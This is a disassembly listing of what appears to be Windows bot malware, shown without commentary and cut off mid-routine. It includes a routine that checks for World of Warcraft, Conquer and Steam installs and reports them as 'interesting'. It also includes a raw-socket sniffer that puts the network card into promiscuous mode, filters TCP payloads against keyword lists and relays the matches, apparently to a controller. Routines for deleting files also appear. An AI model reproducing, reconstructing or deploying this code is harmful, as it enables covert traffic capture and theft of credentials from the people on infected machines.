add esp, 0Ch
test eax, eax
jnz short loc_415C0E
mov [ebp+var_410], 1
loc_415C0E: ; CODE XREF: sub_415B60+A2�j
push offset aWorldOfWarcraf ; "World Of Warcraft"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C2F
mov [ebp+var_408], 1
loc_415C2F: ; CODE XREF: sub_415B60+C3�j
push offset aConquer ; "[Conquer]"
lea eax, [ebp+var_400]
push eax
call sub_416DDE ; strcmp
pop ecx
pop ecx
test eax, eax
jnz short loc_415C50
mov [ebp+var_404], 1
loc_415C50: ; CODE XREF: sub_415B60+E4�j
jmp loc_415BB5
; ---------------------------------------------------------------------------
loc_415C55: ; CODE XREF: sub_415B60+6C�j
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareMicr_0 ; "SOFTWARE\\Microsoft\\VisualStudio\\6.0\\Set"...
push 80000002h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415C88
mov [ebp+var_5C4], 1
loc_415C88: ; CODE XREF: sub_415B60+11C�j
push [ebp+var_5C0]
call ds:dword_417028 ; RegCloseKey
and [ebp+var_5C0], 0
lea eax, [ebp+var_5C0]
push eax
push 20019h
push 0
push offset aSoftwareValveS ; "Software\\Valve\\Steam"
push 80000001h
call ds:dword_417008 ; RegOpenKeyExA
test eax, eax
jnz short loc_415CC7
mov [ebp+var_40C], 1
loc_415CC7: ; CODE XREF: sub_415B60+15B�j
push [ebp+var_5C0]
call ds:dword_417028 ; RegCloseKey
movsx eax, [ebp+var_41C]
test eax, eax
jz short loc_415D1E
cmp [ebp+var_410], 0
jnz short loc_415D1E
cmp [ebp+var_5C4], 0
jnz short loc_415D1E
cmp [ebp+var_40C], 0
jnz short loc_415D1E
cmp [ebp+var_408], 0
jnz short loc_415D1E
cmp [ebp+var_404], 0
jnz short loc_415D1E
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
jmp locret_415DF9
; ---------------------------------------------------------------------------
loc_415D1E: ; CODE XREF: sub_415B60+17C�j
; sub_415B60+185�j ...
cmp [ebp+var_404], 0
jz short loc_415D33
mov [ebp+var_5C8], offset aYes ; "Yes"
jmp short loc_415D3D
; ---------------------------------------------------------------------------
loc_415D33: ; CODE XREF: sub_415B60+1C5�j
mov [ebp+var_5C8], offset aNo ; "No"
loc_415D3D: ; CODE XREF: sub_415B60+1D1�j
cmp [ebp+var_408], 0
jz short loc_415D52
mov [ebp+var_5CC], offset aYes ; "Yes"
jmp short loc_415D5C
; ---------------------------------------------------------------------------
loc_415D52: ; CODE XREF: sub_415B60+1E4�j
mov [ebp+var_5CC], offset aNo ; "No"
loc_415D5C: ; CODE XREF: sub_415B60+1F0�j
cmp [ebp+var_40C], 0
jz short loc_415D71
mov [ebp+var_5D0], offset aYes ; "Yes"
jmp short loc_415D7B
; ---------------------------------------------------------------------------
loc_415D71: ; CODE XREF: sub_415B60+203�j
mov [ebp+var_5D0], offset aNo ; "No"
loc_415D7B: ; CODE XREF: sub_415B60+20F�j
cmp [ebp+var_5C4], 0
jz short loc_415D90
mov [ebp+var_5D4], offset aYes ; "Yes"
jmp short loc_415D9A
; ---------------------------------------------------------------------------
loc_415D90: ; CODE XREF: sub_415B60+222�j
mov [ebp+var_5D4], offset aNo ; "No"
loc_415D9A: ; CODE XREF: sub_415B60+22E�j
cmp [ebp+var_410], 0
jz short loc_415DAF
mov [ebp+var_5D8], offset aYes ; "Yes"
jmp short loc_415DB9
; ---------------------------------------------------------------------------
loc_415DAF: ; CODE XREF: sub_415B60+241�j
mov [ebp+var_5D8], offset aNo ; "No"
loc_415DB9: ; CODE XREF: sub_415B60+24D�j
push [ebp+var_5C8]
push [ebp+var_5CC]
push [ebp+var_5D0]
push [ebp+var_5D4]
push [ebp+var_5D8]
push offset dword_41D5CC
lea eax, [ebp+var_5B4]
push eax
call sub_40D53F
add esp, 1Ch
push [ebp+var_5B8]
call sub_409763
pop ecx
xor eax, eax
locret_415DF9: ; CODE XREF: sub_415B60+1B9�j
leave
retn 4
sub_415B60 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415DFD proc near ; CODE XREF: sub_40A9CF+12FF�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push 1A7h
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_415E17
jmp short locret_415E3F
; ---------------------------------------------------------------------------
loc_415E17: ; CODE XREF: sub_415DFD+16�j
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 4
push eax
call sub_405F67
pop ecx
pop ecx
push offset aListingInteres ; "Listing interesting processes"
push 0
push [ebp+var_4]
push offset sub_415B60
call sub_4095A4
add esp, 10h
locret_415E3F: ; CODE XREF: sub_415DFD+18�j
leave
retn
sub_415DFD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415E41 proc near ; CODE XREF: sub_415EB7+37�p
; sub_415EB7+59�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
jmp short loc_415E52
; ---------------------------------------------------------------------------
loc_415E4B: ; CODE XREF: sub_415E41+69�j
; sub_415E41:loc_415EB1�j
mov eax, [ebp+var_4]
inc eax
mov [ebp+var_4], eax
loc_415E52: ; CODE XREF: sub_415E41+8�j
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4], 0
jz short loc_415EB3
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EB1
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
cmp dword ptr [ecx+eax*4+4], 0
jz short loc_415EAC
mov eax, [ebp+var_4]
shl eax, 1
mov ecx, [ebp+arg_0]
push dword ptr [ecx+eax*4+4]
push [ebp+arg_8]
push [ebp+arg_4]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EAC
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EAC: ; CODE XREF: sub_415E41+49�j
; sub_415E41+67�j
push 1
pop eax
jmp short locret_415EB5
; ---------------------------------------------------------------------------
loc_415EB1: ; CODE XREF: sub_415E41+3A�j
jmp short loc_415E4B
; ---------------------------------------------------------------------------
loc_415EB3: ; CODE XREF: sub_415E41+1D�j
xor eax, eax
locret_415EB5: ; CODE XREF: sub_415E41+6E�j
leave
retn
sub_415E41 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415EB7 proc near ; CODE XREF: sub_415F69+420�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_C], 0
jz short loc_415EDD
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_407ACA
add esp, 0Ch
test eax, eax
jz short loc_415EDD
push 1
pop eax
jmp loc_415F67
; ---------------------------------------------------------------------------
loc_415EDD: ; CODE XREF: sub_415EB7+7�j
; sub_415EB7+1C�j
cmp [ebp+arg_8], 1
jb short loc_415EFF
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D6FC
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415EFF
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415EFF: ; CODE XREF: sub_415EB7+2A�j
; sub_415EB7+41�j
cmp [ebp+arg_8], 2
jb short loc_415F21
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D758
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F21
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F21: ; CODE XREF: sub_415EB7+4C�j
; sub_415EB7+63�j
cmp [ebp+arg_8], 3
jb short loc_415F43
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D7CC
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F43
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F43: ; CODE XREF: sub_415EB7+6E�j
; sub_415EB7+85�j
cmp [ebp+arg_8], 4
jb short loc_415F65
push [ebp+arg_4]
push [ebp+arg_0]
push offset off_41D810
call sub_415E41
add esp, 0Ch
test eax, eax
jz short loc_415F65
push 1
pop eax
jmp short loc_415F67
; ---------------------------------------------------------------------------
loc_415F65: ; CODE XREF: sub_415EB7+90�j
; sub_415EB7+A7�j
xor eax, eax
loc_415F67: ; CODE XREF: sub_415EB7+21�j
; sub_415EB7+46�j ...
pop ebp
retn
sub_415EB7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415F69 proc near ; DATA XREF: sub_41665C+A6�o
var_19B8 = dword ptr -19B8h
var_19B4 = byte ptr -19B4h
var_18B4 = dword ptr -18B4h
var_18B0 = byte ptr -18B0h
var_17B0 = dword ptr -17B0h
var_17AC = dword ptr -17ACh
var_17A8 = byte ptr -17A8h
var_1628 = dword ptr -1628h
var_1624 = dword ptr -1624h
var_1620 = byte ptr -1620h
var_161C = dword ptr -161Ch
var_1618 = dword ptr -1618h
var_1614 = dword ptr -1614h
var_1610 = dword ptr -1610h
var_160C = byte ptr -160Ch
var_140C = byte ptr -140Ch
var_127E = byte ptr -127Eh
var_1278 = byte ptr -1278h
var_1274 = byte ptr -1274h
var_1268 = word ptr -1268h
var_1264 = byte ptr -1264h
var_1263 = byte ptr -1263h
var_125C = dword ptr -125Ch
var_1258 = word ptr -1258h
var_1254 = byte ptr -1254h
var_1154 = dword ptr -1154h
var_1150 = dword ptr -1150h
var_114C = byte ptr -114Ch
var_114B = byte ptr -114Bh
var_104C = dword ptr -104Ch
var_1048 = word ptr -1048h
var_1044 = dword ptr -1044h
var_1038 = byte ptr -1038h
var_1037 = byte ptr -1037h
var_1030 = byte ptr -1030h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 19B8h
call sub_416BC0
push edi
push 3ABh
push [ebp+arg_0]
lea eax, [ebp+var_1614]
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
push [ebp+arg_0]
call sub_416B4C ; free
pop ecx
movsx eax, [ebp+var_160C]
neg eax
sbb eax, eax
lea ecx, [ebp+var_160C]
and eax, ecx
mov [ebp+var_1624], eax
push 0
push 3
push 2
call ds:dword_417218 ; socket
mov [ebp+var_104C], eax
cmp [ebp+var_104C], 0FFFFFFFFh
jnz short loc_415FDE
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_415FDE: ; CODE XREF: sub_415F69+60�j
push 0FFh
lea eax, [ebp+var_1254]
push eax
call ds:dword_417260 ; gethostname
lea eax, [ebp+var_1254]
push eax
call ds:dword_41723C ; gethostbyname
mov [ebp+var_1154], eax
cmp [ebp+var_1154], 0
jnz short loc_41602B
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_41602B: ; CODE XREF: sub_415F69+A1�j
push 10h
push 0
lea eax, [ebp+var_1048]
push eax
call sub_416B6A ; memset
add esp, 0Ch
mov [ebp+var_1048], 2
mov eax, [ebp+var_1154]
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
mov [ebp+var_1044], eax
push 10h
lea eax, [ebp+var_1048]
push eax
push [ebp+var_104C]
call ds:dword_417208 ; bind
cmp eax, 0FFFFFFFFh
jnz short loc_416093
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_416093: ; CODE XREF: sub_415F69+109�j
mov [ebp+var_1150], 1
push 0
push 0
lea eax, [ebp+var_1620]
push eax
push 0
push 0
push 4
lea eax, [ebp+var_1150]
push eax
push 98000001h
push [ebp+var_104C]
call ds:dword_41725C ; WSAIoctl
cmp eax, 0FFFFFFFFh
jnz short loc_4160EA
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp loc_416657
; ---------------------------------------------------------------------------
loc_4160EA: ; CODE XREF: sub_415F69+160�j
lea eax, [ebp+var_1030]
mov [ebp+var_161C], eax
and [ebp+var_1628], 0
and [ebp+var_4], 0
push [ebp+var_1610]
mov eax, [ebp+var_1614]
push dword ptr [eax]
push offset unk_41D9DC
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 10h
and [ebp+var_1274], 0
and [ebp+var_114C], 0
push 3Fh
pop ecx
xor eax, eax
lea edi, [ebp+var_114B]
rep stosd
stosw
stosb
and [ebp+var_1264], 0
xor eax, eax
lea edi, [ebp+var_1263]
stosd
stosb
lea eax, [ebp+var_114C]
push eax
call sub_40CF25
push eax
call sub_4044F7
pop ecx
pop ecx
lea eax, [ebp+var_1264]
push eax
call sub_40CF25
push eax
call sub_4045B2
pop ecx
pop ecx
lea eax, [ebp+var_114C]
push eax
call ds:dword_417244 ; inet_addr
mov [ebp+var_1618], eax
lea eax, [ebp+var_1264]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1268], ax
and [ebp+var_1038], 0
xor eax, eax
lea edi, [ebp+var_1037]
stosd
stosb
lea eax, [ebp+var_1038]
push eax
call sub_40CF25
push eax
call sub_404552
pop ecx
pop ecx
mov eax, [ebp+var_1044]
mov [ebp+var_125C], eax
lea eax, [ebp+var_1038]
push eax
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_1258], ax
loc_4161E6: ; CODE XREF: sub_415F69+305�j
; sub_415F69+33A�j ...
push 0
push 1028h
lea eax, [ebp+var_1030]
push eax
push [ebp+var_104C]
call ds:dword_417248 ; recv
mov [ebp+var_17AC], eax
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_416217
jmp loc_416637
; ---------------------------------------------------------------------------
loc_416217: ; CODE XREF: sub_415F69+2A7�j
cmp [ebp+var_17AC], 0FFFFFFFFh
jz short loc_416229
cmp [ebp+var_17AC], 0
jnz short loc_41622E
loc_416229: ; CODE XREF: sub_415F69+2B5�j
jmp loc_416637
; ---------------------------------------------------------------------------
loc_41622E: ; CODE XREF: sub_415F69+2BE�j
mov eax, [ebp+var_17AC]
and [ebp+eax+var_1030], 0
mov eax, [ebp+var_161C]
mov al, [eax]
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_161C]
lea eax, [ecx+eax*4]
mov [ebp+var_1628], eax
mov eax, [ebp+var_1628]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_416273
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416273: ; CODE XREF: sub_415F69+303�j
mov eax, [ebp+var_1628]
mov al, [eax+0Ch]
shr al, 4
and al, 0Fh
movzx eax, al
mov ecx, [ebp+var_1628]
lea eax, [ecx+eax*4]
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
lea ecx, [ebp+var_1030]
sub eax, ecx
cmp eax, [ebp+var_17AC]
jb short loc_4162A8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162A8: ; CODE XREF: sub_415F69+338�j
push [ebp+var_4]
call sub_416B40 ; strlen
pop ecx
mov [ebp+var_17AC], eax
mov eax, [ebp+var_161C]
movzx eax, byte ptr [eax+9]
cmp eax, 6
jnz loc_416632
movsx eax, [ebp+var_127E]
test eax, eax
jz short loc_4162EB
mov eax, [ebp+var_161C]
mov eax, [eax+10h]
cmp eax, [ebp+var_125C]
jz short loc_4162EB
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4162EB: ; CODE XREF: sub_415F69+36A�j
; sub_415F69+37B�j
movsx eax, [ebp+var_1278]
test eax, eax
jz short loc_41630C
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jz short loc_41630C
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_41630C: ; CODE XREF: sub_415F69+38B�j
; sub_415F69+39C�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
movzx ecx, [ebp+var_1258]
cmp eax, ecx
jnz short loc_416340
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_125C]
jnz short loc_416340
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416340: ; CODE XREF: sub_415F69+3BF�j
; sub_415F69+3D0�j
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
movzx ecx, [ebp+var_1268]
cmp eax, ecx
jnz short loc_416374
mov eax, [ebp+var_161C]
mov eax, [eax+0Ch]
cmp eax, [ebp+var_1618]
jnz short loc_416374
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416374: ; CODE XREF: sub_415F69+3F3�j
; sub_415F69+404�j
push [ebp+var_1624]
push [ebp+var_1610]
push [ebp+var_17AC]
push [ebp+var_4]
call sub_415EB7
add esp, 10h
test eax, eax
jz loc_416632
and [ebp+var_19B8], 0
jmp short loc_4163AF
; ---------------------------------------------------------------------------
loc_4163A2: ; CODE XREF: sub_415F69:loc_416413�j
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_4163AF: ; CODE XREF: sub_415F69+437�j
mov eax, [ebp+var_19B8]
cmp eax, [ebp+var_17AC]
jnb short loc_416415
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Dh
jnz short loc_4163DA
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Dh
loc_4163DA: ; CODE XREF: sub_415F69+463�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 0Ah
jnz short loc_4163F7
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 3Eh
loc_4163F7: ; CODE XREF: sub_415F69+480�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_416413
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
mov byte ptr [eax], 2Eh
loc_416413: ; CODE XREF: sub_415F69+49C�j
jmp short loc_4163A2
; ---------------------------------------------------------------------------
loc_416415: ; CODE XREF: sub_415F69+452�j
and [ebp+var_19B8], 0
mov eax, [ebp+var_19B8]
mov [ebp+var_17AC], eax
jmp short loc_416437
; ---------------------------------------------------------------------------
loc_41642A: ; CODE XREF: sub_415F69+507�j
; sub_415F69+51A�j ...
mov eax, [ebp+var_19B8]
inc eax
mov [ebp+var_19B8], eax
loc_416437: ; CODE XREF: sub_415F69+4BF�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
test eax, eax
jnz short loc_41645F
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
jmp short loc_4164AA
; ---------------------------------------------------------------------------
loc_41645F: ; CODE XREF: sub_415F69+4DC�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 7Fh
jl short loc_416472
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416472: ; CODE XREF: sub_415F69+505�j
mov eax, [ebp+var_4]
add eax, [ebp+var_19B8]
movsx eax, byte ptr [eax]
cmp eax, 1Fh
jg short loc_416485
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_416485: ; CODE XREF: sub_415F69+518�j
mov eax, [ebp+var_4]
add eax, [ebp+var_17AC]
mov ecx, [ebp+var_4]
add ecx, [ebp+var_19B8]
mov cl, [ecx]
mov [eax], cl
mov eax, [ebp+var_17AC]
inc eax
mov [ebp+var_17AC], eax
jmp short loc_41642A
; ---------------------------------------------------------------------------
loc_4164AA: ; CODE XREF: sub_415F69+4F4�j
cmp [ebp+var_17AC], 0
jnz short loc_4164B8
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_4164B8: ; CODE XREF: sub_415F69+548�j
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+0Ch]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_19B4]
push eax
call sub_407A56
add esp, 0Ch
push 100h
mov eax, [ebp+var_161C]
push dword ptr [eax+10h]
call ds:dword_41721C ; inet_ntoa
push eax
lea eax, [ebp+var_18B0]
push eax
call sub_407A56
add esp, 0Ch
mov eax, [ebp+var_1628]
mov ax, [eax+2]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
lea eax, [ebp+var_18B0]
push eax
mov eax, [ebp+var_1628]
mov ax, [eax]
push eax
call ds:dword_417238 ; htons
movzx eax, ax
push eax
lea eax, [ebp+var_19B4]
push eax
push offset dword_41D9A8
lea eax, [ebp+var_17A8]
push eax
call sub_416B5E ; sprintf
add esp, 18h
mov [ebp+var_18B4], eax
mov eax, 180h
sub eax, [ebp+var_18B4]
push eax
push [ebp+var_4]
mov eax, [ebp+var_18B4]
lea eax, [ebp+eax+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_4165AD
jmp loc_416655
; ---------------------------------------------------------------------------
loc_4165AD: ; CODE XREF: sub_415F69+63D�j
mov eax, 180h
sub eax, [ebp+var_18B4]
dec eax
mov [ebp+var_17B0], eax
loc_4165BF: ; CODE XREF: sub_415F69+6C7�j
mov eax, [ebp+var_17B0]
cmp eax, [ebp+var_17AC]
jnb short loc_416632
push 180h
mov eax, [ebp+var_4]
add eax, [ebp+var_17B0]
push eax
lea eax, [ebp+var_17A8]
push eax
call sub_407A56
add esp, 0Ch
lea eax, [ebp+var_17A8]
push eax
push offset dword_418B64
lea eax, [ebp+var_140C]
push eax
call sub_40D53F
add esp, 0Ch
push 3E8h
call ds:dword_41709C ; Sleep
mov eax, [ebp+var_1614]
cmp dword ptr [eax+4], 0
jz short loc_41661F
jmp short loc_416653
; ---------------------------------------------------------------------------
loc_41661F: ; CODE XREF: sub_415F69+6B2�j
mov eax, [ebp+var_17B0]
add eax, 17Fh
mov [ebp+var_17B0], eax
jmp short loc_4165BF
; ---------------------------------------------------------------------------
loc_416632: ; CODE XREF: sub_415F69+35B�j
; sub_415F69+42A�j ...
jmp loc_4161E6
; ---------------------------------------------------------------------------
loc_416637: ; CODE XREF: sub_415F69+2A9�j
; sub_415F69:loc_416229�j ...
push [ebp+var_104C]
call ds:dword_417230 ; closesocket
push [ebp+var_1614]
call sub_409763
pop ecx
xor eax, eax
jmp short loc_416657
; ---------------------------------------------------------------------------
loc_416653: ; CODE XREF: sub_415F69+6B4�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416655: ; CODE XREF: sub_415F69+63F�j
jmp short loc_416637
; ---------------------------------------------------------------------------
loc_416657: ; CODE XREF: sub_415F69+70�j
; sub_415F69+BD�j ...
pop edi
leave
retn 4
sub_415F69 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41665C proc near ; CODE XREF: sub_40A9CF+9FE�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push 3ABh
call sub_416B46 ; malloc
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_41667B
jmp locret_41670F
; ---------------------------------------------------------------------------
loc_41667B: ; CODE XREF: sub_41665C+18�j
cmp [ebp+arg_4], 0
jz short loc_41668F
push [ebp+arg_4]
call sub_416B9C ; atoi
pop ecx
mov [ebp+var_8], eax
jmp short loc_416696
; ---------------------------------------------------------------------------
loc_41668F: ; CODE XREF: sub_41665C+23�j
mov [ebp+var_8], 3
loc_416696: ; CODE XREF: sub_41665C+31�j
mov eax, [ebp+var_4]
mov ecx, [ebp+var_8]
mov [eax+4], ecx
cmp [ebp+arg_8], 0
jz short loc_4166AD
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
jmp short loc_4166B4
; ---------------------------------------------------------------------------
loc_4166AD: ; CODE XREF: sub_41665C+47�j
mov [ebp+var_C], offset byte_41DE30
loc_4166B4: ; CODE XREF: sub_41665C+4F�j
push 200h
push [ebp+var_C]
mov eax, [ebp+var_4]
add eax, 8
push eax
call sub_407A56
add esp, 0Ch
push 1A3h
push [ebp+arg_0]
mov eax, [ebp+var_4]
add eax, 208h
push eax
call sub_416B52 ; memcpy
add esp, 0Ch
mov eax, [ebp+var_4]
push dword ptr [eax+4]
push offset dword_41DA10
mov eax, [ebp+arg_0]
movsx eax, byte ptr [eax+18Bh]
neg eax
sbb eax, eax
inc eax
push eax
push [ebp+var_4]
push offset sub_415F69
call sub_4095A4
add esp, 14h
locret_41670F: ; CODE XREF: sub_41665C+1A�j
leave
retn
sub_41665C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_416711 proc near ; CODE XREF: sub_4167B9+6�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41673B
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
push 1
pop eax
jmp short locret_41673D
; ---------------------------------------------------------------------------
loc_41673B: ; CODE XREF: sub_416711+1A�j
xor eax, eax
locret_41673D: ; CODE XREF: sub_416711+28�j
leave
retn
sub_416711 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41673F proc near ; CODE XREF: sub_40A9CF+C23�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ecx
push offset aRb ; "rb"
push [ebp+arg_0]
call sub_416B88 ; fopen
pop ecx
pop ecx
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41679C
push 2
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B76 ; ftell
pop ecx
mov [ebp+var_8], eax
push 0
push 0
push [ebp+var_4]
call sub_416B96 ; fseek
add esp, 0Ch
push [ebp+var_4]
call sub_416B82 ; fclose
pop ecx
mov eax, [ebp+var_8]
inc eax
neg eax
sbb eax, eax
and eax, [ebp+var_8]
jmp short locret_41679E
; ---------------------------------------------------------------------------
loc_41679C: ; CODE XREF: sub_41673F+1B�j
xor eax, eax
locret_41679E: ; CODE XREF: sub_41673F+5B�j
leave
retn
sub_41673F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167A0 proc near ; CODE XREF: sub_4167B9+13�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call ds:dword_4170AC ; DeleteFileA
test eax, eax
jz short loc_4167B5
push 1
pop eax
jmp short loc_4167B7
; ---------------------------------------------------------------------------
loc_4167B5: ; CODE XREF: sub_4167A0+E�j
xor eax, eax
loc_4167B7: ; CODE XREF: sub_4167A0+13�j
pop ebp
retn
sub_4167A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167B9 proc near ; CODE XREF: sub_402698+1D9�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push [ebp+arg_0]
call sub_416711
pop ecx
test eax, eax
jz short loc_4167D9
push [ebp+arg_0]
call sub_4167A0
pop ecx
neg eax
sbb eax, eax
inc eax
jmp short loc_4167DB
; ---------------------------------------------------------------------------
loc_4167D9: ; CODE XREF: sub_4167B9+E�j
xor eax, eax
loc_4167DB: ; CODE XREF: sub_4167B9+1E�j
pop ebp
retn
sub_4167B9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4167DD proc near ; CODE XREF: sub_40A9CF+8E9�p
var_4 = dword ptr -4
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_4]
push dword ptr [eax]
call sub_40ED38
pop ecx
mov [ebp+var_4], eax
leave
retn
sub_4167DD endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_4167F1 proc near ; DATA XREF: .Polyene:004203E2�o
var_12F4 = dword ptr -12F4h
var_12F0 = dword ptr -12F0h
var_12EC = byte ptr -12ECh
var_115C = byte ptr -115Ch
var_1128 = dword ptr -1128h
var_1121 = byte ptr -1121h
var_1120 = byte ptr -1120h
var_101C = dword ptr -101Ch
var_1018 = byte ptr -1018h
var_18 = dword ptr -18h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_417298
push offset sub_416DBA
mov eax, large fs:0
push eax
mov large fs:0, esp
push ecx
push ecx
mov eax, 12DCh
call sub_416BC0
push ebx
push esi
push edi
mov [ebp+var_18], esp
push 2
call ds:dword_4170F4 ; SetErrorMode
and [ebp+var_4], 0
push dword_41DA54
push dword_41DA50
push 3B6h
push dword_41DA4C
push 0
push dword_41DA48
